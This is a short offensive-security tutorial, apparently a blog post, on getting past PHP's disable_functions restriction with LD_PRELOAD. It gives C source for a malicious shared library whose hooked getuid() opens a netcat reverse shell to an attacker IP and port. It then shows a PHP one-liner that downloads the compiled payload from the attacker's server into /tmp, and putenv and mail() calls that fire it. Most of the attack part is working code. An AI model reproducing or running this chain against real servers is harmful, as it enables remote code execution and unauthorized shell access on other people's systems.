What is disable_function?
disable_function is a security method used to prevent specific functions to be executed on the system. Some functions that are commonly diabled are exec ,passthru ,shell_exec,proc_open,curl_exec, system, and fread.
It makes it so that the file that it is pointing to, will be loaded before any other library. In order for this to work, it will need to point to a .so. These .so files are C dynamically linked libraries. So we will write a malicious file using LD_PRELOAD, then compile it into a .so and finally, upload it to the server.
Attack
Code
In the following code, we have the shell and the getuid functions. In the first one, we can include any payload. This part is the malicious code that will be executed in order to give us further access into the machine. The second function uses getuid to overwrite the origin, and getenv to get the value of the enviroment varibale LD_PRELOAD.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
void shell(){
system("nc -e /bin/sh 10.10.11.11 1234");
}
int getuid(){
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
shell();
}
File Upload
There are hundreds of different ways to get a upload a file into a target system, but in this case I’ll explain the method using file_get_contents. Using this method we can write our file into a directory. Usually tmp is used for this, because of the permissions.
So everything that we have to do is run a Python Http server on our machine, and use the following code on the browser, in order to get the contents of our malicious libreary and write into a file.
1
fwrite(fopen("/tmp/exp.so",'w'),file_get_contents("http://10.10.11.11:81/payload.so"))
RCE
Once the file is uploaded we have two different ways of firing up the shell. One is by uploading a php file, and the other one is through directly interacting with it through the browser. Additionally we will make use of the PHP putenv and mail exploits.
Putenv
Assigns a variable to the server environment. This environment variable will only exist during the request. In this case it is used to assign our payload file to the LD_PRELOAD, so it is succesfully ran before the function disableling happens.
Usage:
1
putenv(string `$assignment`): bool
The mail function is used to send emails. It receives five parameters: To, Subject, Message, Headers (Optional), and Parameters (Optional). In this case, we will use its daemon in order to use its functions.
Usage:
1
2
3
4
5
6
7
mail(
string `$to`,
string `$subject`,
string `$message`,
string `$additional_headers` = ?,
string `$additional_parameters` = ?
): bool
PHP File
This file makes use of
1
<?php putenv("LD_PRELOAD=./payload.so"); mail('soda','soda','soda','soda','soda'); ?>
In browser
1
putenv("LD_PRELOAD=/tmp/payload.so").mail("soda","soda","soda","soda","soda")
Resources
Upload using file_get_contents